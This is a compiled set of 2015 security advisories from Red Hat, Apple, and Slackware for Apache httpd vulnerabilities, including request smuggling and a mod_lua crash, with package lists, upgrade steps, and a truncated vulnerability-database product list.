Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1202988 - CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug 1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser 1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4 1243891 - CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path
- Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source: httpd24-httpd-2.4.12-4.el6.2.src.rpm
noarch: httpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm
x86_64: httpd24-httpd-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm httpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm httpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source: httpd24-httpd-2.4.12-6.el7.1.src.rpm
noarch: httpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm
x86_64: httpd24-httpd-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-0228 https://access.redhat.com/security/cve/CVE-2015-0253 https://access.redhat.com/security/cve/CVE-2015-3183 https://access.redhat.com/security/cve/CVE-2015-3185 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFV22bPXlSAg2UNWIIRAmm2AKCI6AByn1Zlj/2R8aLKFD4hZno5VgCfcx8H y5DWl0MjeqKeAOHiddwyDdU= =yzQP -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . These issues were addressed by updating Apache to version 2.4.16. CVE-ID CVE-2013-5704 CVE-2014-3581 CVE-2014-3583 CVE-2014-8109 CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 CVE-2015-3185
BIND Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities in BIND, the most severe of which may allow a remote attacker to cause a denial of service Description: Multiple vulnerabilities existed in BIND versions prior to 9.9.7. These issues were addressed by updating BIND to version 9.9.7. CVE-ID CVE-2014-8500 CVE-2015-1349
PostgreSQL Available for: OS X Yosemite v10.10.4 or later Impact: Multiple vulnerabilities in PostgreSQL, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PostgreSQL versions prior to 9.3.9. These issues were addressed by updating PostgreSQL to version 9.3.9. CVE-ID CVE-2014-0067 CVE-2014-8161 CVE-2015-0241 CVE-2015-0242 CVE-2015-0243 CVE-2015-0244 CVE-2015-3165 CVE-2015-3166 CVE-2015-3167
Wiki Server Available for: OS X Yosemite v10.10.4 or later Impact: Multiple XML security issues in Wiki Server Description: Multiple XML vulnerabilities existed in Wiki Server based on Twisted. This issue was addressed by removing Twisted. CVE-ID CVE-2015-5911 : Zachary Jones of WhiteHat Security Threat Research Center
OS X Server 5.0.3 may be obtained from the Mac App Store.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/httpd-2.4.16-i486-1_slack14.1.txz: Upgraded. This update fixes the following security issues: * CVE-2015-0253: Fix a crash with ErrorDocument 400 pointing to a local URL-path with the INCLUDES filter active, introduced in 2.4.11. * CVE-2015-3183: core: Fix chunk header parsing defect. Remove apr_brigade_flatten(), buffering and duplicated code from the HTTP_IN filter, parse chunks in a single pass with zero copy. Limit accepted chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. * CVE-2015-3185: Replacement of ap_some_auth_required (unusable in Apache httpd 2.4) with new ap_some_authn_required and ap_force_authn hook. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.16-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.16-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.16-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.16-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.16-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.16-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 14.0 package: d78c9925e69ba6ce14d67fb67245981b httpd-2.4.16-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 1370e3c7e135bf07b65e73049099a942 httpd-2.4.16-x86_64-1_slack14.0.txz
Slackware 14.1 package: ea116c45bba8c80f59cfe0394a8f87fa httpd-2.4.16-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 8b5b1caa1fa203b07b529f77834fac16 httpd-2.4.16-x86_64-1_slack14.1.txz
Slackware -current package: 01ccb961f17bd14c1d157892af4c9f1d n/httpd-2.4.16-i586-1.txz
Slackware x86_64 -current package: 70a6644de3585007861e57cf08608843 n/httpd-2.4.16-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg httpd-2.4.16-i486-1_slack14.1.txz
Then, restart Apache httpd:
/etc/rc.d/rc.httpd stop
/etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0050", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "http server", scope: "lte", trust: 1.8, vendor: "apache", version: "2.4.12", }, { model: "mac os x server", scope: "eq", trust: 1.6, vendor: "apple", version: "5.0.3", }, { model: "mac os x", scope: "eq", trust: 1.6, vendor: "apple", version: "10.10.4", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 1.4, vendor: "oracle", version: "12.1.4", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "12.04", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "14.10", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "10.04", }, { model: "ubuntu linux", scope: "eq", trust: 1, vendor: "canonical", version: "14.04", }, { model: "opensuse", scope: "eq", trust: 1, vendor: "opensuse", version: "13.2", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "mac os x", scope: "eq", trust: 0.8, vendor: "apple", version: "10.10 to 10.10.4", }, { model: "mac os x", scope: "eq", trust: 0.8, vendor: "apple", version: "10.9.5", }, { model: "macos server", scope: "lt", trust: 0.8, vendor: "apple", version: "5.0.3 (os x yosemite v10.10.5 or later )", }, { model: "opensuse", scope: "eq", trust: 0.6, vendor: "novell", version: "13.2", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: 